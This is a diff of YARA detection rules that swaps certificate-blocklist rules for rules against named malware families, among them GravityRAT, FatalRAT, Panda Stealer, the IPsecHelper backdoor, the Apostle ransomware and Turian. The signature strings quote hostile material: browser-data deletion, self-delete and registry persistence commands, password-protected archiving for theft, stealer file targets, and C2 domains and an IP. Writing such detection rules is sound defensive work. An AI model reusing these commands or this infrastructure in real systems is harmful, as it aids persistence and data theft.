-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1767-L1778"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6064-L6084"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0d9813d79f86ff22d5478469bee6cf457afe3780dd4308caa5da502faf816377"
+		logic_hash = "d9a72717d124bcf1e3b95850cd524e577abe96a094586a5555faadba78fcb9ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d5431403ba7b026666e72c675aac6c46720583a60320c5c2c0f74331fe845c35"
-		importance = 20
+
+	strings:
+		$s1 = "shellx.pif" fullword ascii nocase
+		$s2 = "Beasty" fullword ascii
+		$s3 = "* Boot:[" ascii
+		$s4 = "^ Shut Down:[" ascii
+		$s5 = "set cdaudio door" ascii
+		$s6 = "This \"Portable Network Graphics\" image is not valid" wide
+		$n1 = ".aol.com" ascii
+		$n2 = "web.icq.com" ascii
+		$n3 = "&fromemail=" fullword ascii
+		$n4 = "&subject=" fullword ascii
+		$n5 = "&Send=" fullword ascii
+		$n6 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword ascii
+		$n7 = "mirabilis.com" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PETROYL GROUP, TOV" and pe.signatures [ i ] . serial == "00:f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $n* ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_56D576A062491Ea0A5877Ced418203A1 : FILE
+rule DITEKSHEN_MALWARE_Win_Gravityrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GravityRAT"
 		author = "ditekSHen"
-		id = "94e29354-b6bc-5936-abc8-2b42d2e65294"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "cb581dd6-15b2-54ae-9f27-30ec21554fb9"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1780-L1791"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6086-L6108"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "877b773cb1bdc6c6c309374e95dc7eac4d525c681200169fcf492476f6335342"
+		logic_hash = "a6b049dbf21f22f751c15da98536e9ef2a4ced7755ade0cc9904afddef1d3ae6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b22e022f030cf1e760a7df84d22e78087f3ea2ed262a4b76c8b133871c58213b"
-		importance = 20
+
+	strings:
+		$s1 = "/GX/GX-Server.php?VALUE=2&Type=" wide
+		$s2 = "&SIGNATUREHASH=" wide
+		$s3 = "Error => CommonFunctionClass => Upload()" wide
+		$s4 = "/GetActiveDomains.php" wide
+		$s5 = "DetectVM" ascii wide
+		$s6 = "/c {0} > {1}" wide
+		$s7 = "DRIVEUPLOADCOMPLETED => TOTALFILES={0}, FILESUPLOADED={1}" wide
+		$s8 = "Program => RunAFile()" wide
+		$s9 = "DoViaCmd" ascii
+		$s10 = ".msoftupdates.com:" wide
+		$f1 = "<RootJob>b__" ascii
+		$f2 = "<GetFiles>b__" ascii
+		$f3 = "<UpdateServer>b__" ascii
+		$f4 = "<EthernetId>b__" ascii
+		$f5 = "<MatchMacAdd>b__" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Silvo LLC" and pe.signatures [ i ] . serial == "56:d5:76:a0:62:49:1e:a0:a5:87:7c:ed:41:82:03:a1" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $f* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4152169F22454Ed604D03555B7Afb175 : FILE
+rule DITEKSHEN_MALWARE_Win_Fatalrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects FatalRAT"
 		author = "ditekSHen"
-		id = "61286549-7561-5607-9073-2a3ee0d54a44"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f9d0c5dd-ae69-512d-a260-01b9765e10eb"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1793-L1804"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6110-L6128"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee965ee8b6ebbb6171e3b10a7887acf35c9ed7fcbe49b7f403190c7fb046ec63"
+		logic_hash = "fb7f6822aa4ef98e77670d276d06c9a37718bce38d32ce5b53fe67513b107fbe"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a1561cacd844fcb62e9e0a8ee93620b3b7d4c3f4bd6f3d6168129136471a7fdb"
-		importance = 20
+
+	strings:
+		$x1 = "XXAcQbcXXfRSScR" fullword ascii
+		$s1 = "CHROME_NO_DATA" fullword ascii
+		$s2 = "CHROME_UNKNOW" fullword ascii
+		$s3 = "-Thread running..." ascii
+		$s4 = "InetCpl.cpl,ClearMyTracksByProcess" ascii nocase
+		$s5 = "MSAcpi_ThermalZoneTemperature" ascii nocase
+		$s6 = "taskkill /f /im rundll32.exe" fullword ascii nocase
+		$s7 = "del /s /f %appdata%\\Mozilla\\Firefox" ascii nocase
+		$s8 = "\\\\%s\\C$\\" ascii
+		$s9 = "fnGetChromeUserInfo" fullword ascii
+		$s10 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACKTECH SOFTWARE LIMITED" and pe.signatures [ i ] . serial == "41:52:16:9f:22:45:4e:d6:04:d0:35:55:b7:af:b1:75" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_41D05676E0D31908Be4Dead3486Aeae3 : FILE
+rule DITEKSHEN_MALWARE_Win_Wingo : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects malicious Golang executables"
 		author = "ditekSHen"
-		id = "d668f53b-3d1c-5fcb-9f9c-2923e63f93a9"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "bc0c84d6-7ea1-5234-89f6-98337900e044"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1806-L1817"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6130-L6141"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e4eb406e433b38ac127ba22040c48b510636eb55e2b524b02386710709d343b6"
+		logic_hash = "423b1631ad625fd46a9d10f0ecdf24931cf62a2c1694da3ebdd38daad0a4f724"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "e6e597527853ee64b45d48897e3ca4331f6cc08a88cc57ff2045923e65461598"
-		importance = 20
+
+	strings:
+		$s1 = "Go build ID:" ascii
+		$s2 = /main\.[a-z]{9}Delete/ fullword ascii
+		$s3 = /main\.[a-z]{9}Update/ fullword ascii
+		$s4 = /main\.[a-z]{9}rundll/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rov SP Z O O" and pe.signatures [ i ] . serial == "41:d0:56:76:e0:d3:19:08:be:4d:ea:d3:48:6a:ea:e3" )
+		uint16( 0 ) == 0x5a4d and ( all of them and #s2 > 2 and #s3 > 2 and #s4 > 2 )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_13C7B92282Aae782Bfb00Baf879935F4 : FILE
+rule DITEKSHEN_MALWARE_Win_GENERIC03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown malicious executables"
 		author = "ditekSHen"
-		id = "244ff442-0bce-5f9f-85ea-33fafe9a2e7b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "aa0a720d-8215-58d8-b3ce-98d50318cbf9"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1819-L1830"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6143-L6154"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2742fd71eb8219db7785ad46be18a906fdab0914f632dfbf531238fd551a5b65"
+		logic_hash = "9166808a3dab80d9d85b3b976ae658160c8389c7d0e05a46d553b5bb9d41a1cb"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "c253cce2094c0a4ec403518d4fbf18c650e5434759bc690758cb3658b75c8baa"
-		importance = 20
+
+	strings:
+		$s1 = "lbroscfg.dll" wide
+		$s2 = "cmd /c ping 127.0.0.1 & del /f /q \"" fullword wide
+		$s3 = "E:\\Data\\Sysceo\\AD\\" fullword ascii
+		$s4 = "C++\\Browser_noime\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "13:c7:b9:22:82:aa:e7:82:bf:b0:0b:af:87:99:35:f4" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D627F1000D12485995514Bfbdefc55D9 : FILE
+rule DITEKSHEN_MALWARE_Win_Pandastealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Panda Stealer"
 		author = "ditekSHen"
-		id = "dd18086c-063b-542e-915b-5bd452ee452e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "099f0a03-6dfd-5ae5-baaf-fe2b66de759d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1832-L1843"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6156-L6172"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ff60a73b889c8f1df127ead90a93fbf92131cfb475d58eea1ba1569f3e99e00"
+		logic_hash = "23a911bfe14defe8f961068d43bb349b66ee73f8b2f281f2bec1c0ecb8f37b25"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "5fac3a6484e93f62686e12de3611f7a5251009d541f65e8fe17decc780148052"
-		importance = 20
+
+	strings:
+		$s1 = "\\tokens.txt" fullword ascii
+		$s2 = "user.config" fullword ascii
+		$s3 = "Discord\\" ascii
+		$s4 = "%s\\etilqs_" fullword ascii
+		$s5 = "buildSettingGrabber" ascii
+		$s6 = "buildSettingSteam" ascii
+		$s7 = ".?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@" ascii
+		$s8 = "UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr" ascii
+		$s9 = "|| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THREE D CORPORATION PTY LTD" and pe.signatures [ i ] . serial == "00:d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_62205361A758B00572D417Cba014F007 : FILE
+rule DITEKSHEN_MALWARE_Win_Gelsemine : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Gelsemine"
 		author = "ditekSHen"
-		id = "7838c733-7212-5e86-bb3c-5dfefb727a4b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f7e9ca53-fc52-5da0-a760-cb09c2544f4f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1845-L1856"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6174-L6194"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "52d67bc94e82bb9a36e969d393c395465c84ff76f89c5f8407c20e2c761000e3"
+		logic_hash = "8c20efa6f34ee9165fac9f1f2e5eb20830a02016309dfaa5681977e1a8ac6068"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "83e851e8c50f9d7299363181f2275edc194037be8cb6710762d2099e0b3f31c6"
-		importance = 20
+
+	strings:
+		$s1 = "If any of these steps fails.only pick one of the targets for configuration\"If you want to just get on with it*which also use [ " wide
+		$s2 = "A make implementation+with core modules (please read NOTES.PER_L)2The per_l Text::Template (please read NOTES.PER_L)" wide
+		$s3 = "NOTES.VMS (OpenVMS)!NOTES.WIN (any supported Windows)%NOTES.DJGPP (DOS platform with DJGPP)'NOTES.ANDROID (obviously Android [ND" wide
+		$s4 = "A simple example would be this)which is to be understood as one of these" fullword wide
+		$s5 = "bala bala bala" fullword wide
+		$s6 = "echo FOO" fullword wide
+		$s7 = "?_Tidy@?$basic_string@DU?$char_traits@D@std@@V" ascii
+		$o1 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c }
+		$o2 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c }
+		$o3 = { 8b 76 08 2b f0 a1 34 ff 40 00 03 f0 89 35 38 ff }
+		$o4 = { 83 c4 34 c3 8b 4e 20 6a 05 e8 73 10 00 00 8b 76 }
+		$o5 = { 8b 44 24 44 2b d1 03 d0 8b f2 e9 14 ff ff ff 8d }
+		$o6 = { 68 00 06 00 00 6a 00 e8 d3 ff ff ff a2 48 00 41 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNITEKH-S, OOO" and pe.signatures [ i ] . serial == "62:20:53:61:a7:58:b0:05:72:d4:17:cb:a0:14:f0:07" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $o* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_566Ac16A57B132D3F64Dced14De790Ee : FILE
+rule DITEKSHEN_MALWARE_Win_Gelsevirine : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Gelsevirine"
 		author = "ditekSHen"
-		id = "05f49d36-7bf1-5bbc-b728-e1616366c15e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "70f0ed08-4e07-5ab3-968e-95059d20a8e9"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1858-L1869"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6224-L6254"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0618ce3ce0c5f8923c12a99586bbec8ec86229c7e08af75f5b0756f348d53bd5"
+		logic_hash = "60d41d6d789f1cd2a7040d6535f13c69ea58a489035838f047b886e8f1f37f63"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "2e44464a5907ac46981bebd8eed86d8deec9a4cfafdf1652c8ba68551d4443ff"
-		importance = 20
+
+	strings:
+		$s1 = /64loadpath(xp|sv|7)/ fullword wide
+		$s2 = "{\"Actions\":[]}" fullword wide
+		$s3 = "PlatformsChunk" fullword wide
+		$s4 = "CurrentPluginCategory" fullword wide
+		$s5 = "CurrentOperationPlatform" fullword wide
+		$s6 = "PersistencePlugins" fullword wide
+		$s7 = "memory_library_file" fullword wide
+		$s8 = "LoadPluginBP" fullword ascii
+		$s9 = "GetOperationBasicInformation" fullword ascii
+		$s10 = "commonappdata/Intel/Runtime" wide
+		$s11 = "cfsst x64" fullword wide
+		$s12 = "ForkOperation" fullword ascii
+		$c1 = "domain.dns04.com:8080;domain.dns04.com:443;acro.ns1.name:80;acro.ns1.name:1863;" wide
+		$c2 = "<base64 content=\"" fullword ascii
+		$c3 = "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii
+		$m1 = "6BDA7FEF-232F-4EA6-8FC8-24F58CD7B366" ascii wide
+		$m2 = "46EBBDC3-EEDC-42D4-BA1D-D454DFCE8E42" ascii wide
+		$m3 = "135054C6-8036-42C7-A97C-31F37D7728BD" ascii wide
+		$m4 = "DC7FDDF7-B2F1-4B99-BE6A-AA683FF11CE6" ascii wide
+		$m5 = "131C8113-E083-4C7F-BEAF-82D73B01F2C5" ascii wide
+		$m6 = "4CCF506D-2F61-4C3A-B9C6-9FA47D43A3FC" ascii wide
+		$m7 = "B2DC745A-66AE-4A19-B11C-AD74D46B7EE0" ascii wide
+		$m8 = "6BDA7FEF-232F-4EA6-8FC8-24F58CD7B366" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unirad LLC" and pe.signatures [ i ] . serial == "56:6a:c1:6a:57:b1:32:d3:f6:4d:ce:d1:4d:e7:90:ee" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 2 of ( $c* ) and 4 of ( $s* ) ) or ( 5 of ( $m* ) and ( 1 of ( $c* ) or 3 of ( $s* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_661Ba8F3C9D1B348413484E9A49502F7 : FILE
+rule DITEKSHEN_MALWARE_Win_Ipsechelper : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects IPsecHelper backdoor"
 		author = "ditekSHen"
-		id = "75fb83a1-c493-510a-8c01-4cc699d71465"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f848ac2a-95ad-596a-b193-5cfb424e33a2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1871-L1882"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6256-L6279"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "661af02d7a206f50e996caf690ded541acab8c8268df9e86744d36f7322efe5c"
+		logic_hash = "be0ecf8a97d289b15b902420d769925b7b22ab835bd7d10d10b059119f41e540"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4ca944c9b69f72be3e95f385bdbc70fc7cff4c3ebb76a365bf0ab0126b277b2d"
-		importance = 20
+
+	strings:
+		$s1 = "rundll32.exe advapi32.dll,ProcessIdleTasks" wide
+		$s2 = "CommandExecute" fullword ascii
+		$s3 = "DownloadExecuteUrl" fullword ascii
+		$s4 = "DownloadExecuteFile" fullword ascii
+		$s5 = "CmdExecute" fullword ascii
+		$s6 = "ExecuteProcessWithResult" fullword ascii
+		$s7 = "IsFirstInstance ==> checked" fullword wide
+		$s8 = "del \"%PROG%%SERVICENAME%\".*" fullword wide
+		$s9 = ".CreateConfig" wide
+		$s10 = ".SelfDelete" wide
+		$c1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.google.com/ EmbeddedWB 14.52;" wide
+		$c2 = "boot.php" wide
+		$c3 = "lastupdate.php" wide
+		$c4 = "main.php" wide
+		$c5 = "InternetNeeded" wide
+		$c6 = "DeviceIdSalt" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unique Digital Services Ltd." and pe.signatures [ i ] . serial == "66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $c* ) or 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0092D9B92F8Cf7A1Ba8B2C025Be730C300 : FILE
+rule DITEKSHEN_MALWARE_Win_Apostle : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Apsotle"
 		author = "ditekSHen"
-		id = "856b4522-f314-5cbb-872e-08b21107881b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6e6d2ef0-b709-5915-b644-db86d9d3f26a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1884-L1895"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6281-L6295"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "207fcc48053afb6a435c40fd8e25a88753139c35f4882a1975fdb8c55dc8ea89"
+		logic_hash = "aa5a522383cbb7e2fdb90f4c4395c7f92f546aa1dbda8f44090225861f011630"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b891c96bd8548c60fa86b753f0c4a4ccc7ab51256b4ee984b5187c62470f9396"
-		importance = 20
+
+	strings:
+		$s1 = "bytesToBeEncrypted" fullword ascii
+		$s2 = "SelfDelete" fullword ascii
+		$s3 = "ReadMeFileName" ascii
+		$s4 = "DesktopFileName" ascii
+		$s5 = "SetWallpaper" fullword ascii
+		$s6 = "get_EncryptionKey" fullword ascii
+		$s7 = "disall" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UPLagga Systems s.r.o." and pe.signatures [ i ] . serial == "00:92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E5Ad42C509A7C24605530D35832C091E : FILE
+rule DITEKSHEN_MALWARE_Win_DEADWOOD : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DEADWOOD"
 		author = "ditekSHen"
-		id = "44615e9d-6677-5642-b56d-82c0577f758c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a75e30d8-75ec-5eaf-94f5-5556a3b947ae"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1897-L1908"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6297-L6313"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d76474257ee9a24d4785ddd119e586712a157ff7b420a7db2b8efe06c43f76c"
+		logic_hash = "bf53abc801971b294e0a23bb0162ceb7c56a563a16e73c317f6a890ba545b67d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "17b1f6ffc569acd2cf803c4ac24a7f9828d8d14f6b057e65efdb5c93cc729351"
-		importance = 20
+
+	strings:
+		$s1 = "Service Start Work !!!!" fullword ascii
+		$s2 = "Error GetTokenInformation : " fullword ascii
+		$s3 = "\\Windows\\System32\\net.exe" fullword wide
+		$s4 = "App Start Work !!!!" fullword ascii
+		$s5 = "vmmouse" fullword wide
+		$s6 = "CDPUserSvc_" wide
+		$s7 = "WpnUserService_" wide
+		$s8 = "User is :" wide
+		$s9 = "\\params" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VESNA, OOO" and pe.signatures [ i ] . serial == "00:e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3E57584Db26A2C2Ebc24Ae3E1954Fff6 : FILE
+rule DITEKSHEN_MALWARE_Win_Turian : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for Turian / Qurian"
 		author = "ditekSHen"
-		id = "9073846e-97c7-5b2e-a81f-3bbd06699842"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "eafa9442-a01b-5044-bc47-634297a3efcc"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1910-L1921"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6315-L6343"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cfc68c32ceba351610651d34fb420c64bab9a3b1564d9b6392f0ee8cdcdac7de"
+		logic_hash = "87f4263381c5e93fcba0873aa3bb9a1db4b21225141cd7f06be30f5777a47806"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4ecbada12a11a5ad5fe6a72a8baaf9d67dc07556a42f6e9a9b6765e334099f4e"
-		importance = 20
+		hash1 = "d1218ab9d608ee0212e880204e4d7d75f29f03b77248bca7648d111d67405759"
+		cnc_domain = "windowsupdate[.]dyndns[.]info"
+		cnc_ip = "58[.]158[.]177[.]102"
+
+	strings:
+		$s1 = "%s a -m5 -hp1qaz@WSX3edc -r %s %s\\*.*" ascii wide
+		$s2 = "%s a -m5 -hpMyHost-1 -r %s %s\\*.*" ascii wide
+		$s3 = "%s a -m5 -hp1qaz@WSX3edc -ta%04d%02d%02d000000 -r %s c:" ascii wide
+		$s4 = "%s a -m5 -hpMyHost-1 -ta%04d%02d%02d000000 -r %s c:"
+		$s5 = "cmd /c dir /s /O:D %s>>\"%s\"" ascii wide
+		$s6 = "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v %s /t REG_SZ /d \"%s\" /f" fullword ascii
+		$s7 = "Not Connect!" fullword ascii
+		$p1 = "RECYCLER\\S-1-3-33-854245398-2067806209-0000980848-2003\\" ascii wide
+		$p2 = "%sRECYCLER.{S-1-3-33-854245398-2067806209-0000980848-2003}\\" ascii wide
+		$p3 = "\\RECYCLER.{S-1-3-33-854245398-2067806209-0000980848-2003}\\" ascii wide
+		$p4 = "\\RECYCLER.{645ff040-5081-101b-9f08-00aa002f954e}\\" ascii wide
+		$p5 = "%sRECYCLER.{645ff040-5081-101b-9f08-00aa002f954e}\\" ascii wide
+		$c1 = "CONNECT %s:%u HTTP/1." ascii wide
+		$c2 = "User-Agent: Mozilla/4.0" ascii wide
+		$m1 = "winsupdatetw" fullword ascii wide
+		$m2 = "clientsix" fullword ascii wide
+		$m3 = "updatethres" fullword ascii wide
+		$m4 = "uwatchdaemon" fullword ascii wide
 
 	condition:
